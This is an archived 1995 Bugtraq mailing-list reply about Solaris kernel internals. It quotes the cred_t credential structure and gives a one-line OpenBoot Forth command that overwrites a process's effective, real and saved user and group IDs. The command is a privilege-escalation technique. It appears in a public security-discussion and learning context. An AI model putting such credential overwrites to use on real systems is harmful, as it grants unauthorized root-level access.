Home page logo

bugtraq logo Bugtraq mailing list archives

Re: Pointer to a process's credential structure?
From: fritchie () stolaf edu (Scott Lystig Fritchie)
Date: Mon, 17 Apr 1995 09:52:14 -0500

I feel a little bit sheepish about my lack of knowledge about Solaris
and SysV kernels in general, but what a place to learn.  :-) Many
thanks to those who have replied to me directly or to the list.

"jo" == John C Orthoefer <jco () bbn com> writes:

jo> I could fix up the fc-4.1.3 (make fc-2.3.)  I may when I have time
jo> this week, unless someone else does it first.

Another correspondant mentioned that clobbering an additional two
structure members, the "saved" uid & gid, might be useful, too.  From

typedef struct cred {
        ulong_t cr_ref;                 /* reference count */
        uid_t   cr_uid;                 /* effective user id */
        gid_t   cr_gid;                 /* effective group id */
        uid_t   cr_ruid;                /* real user id */
        gid_t   cr_rgid;                /* real group id */
        uid_t   cr_suid;                /* "saved" user id (from exec) */
        gid_t   cr_sgid;                /* "saved" group id (from exec) */
        ulong_t cr_ngroups;             /* number of groups in cr_groups */
        gid_t   cr_groups[1];           /* supplementary group list */
} cred_t;

That brings the magic Forth to:

        19 4 do {uid} {addr} 24 + l@ i + l! 4 +loop

Scott E. Lystig Fritchie, UNIX Systems Manager
Academic Computing Center, St. Olaf College
1510 St. Olaf Ave., Northfield, MN  55057
fritchie () stolaf edu ... 507/646.3407

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]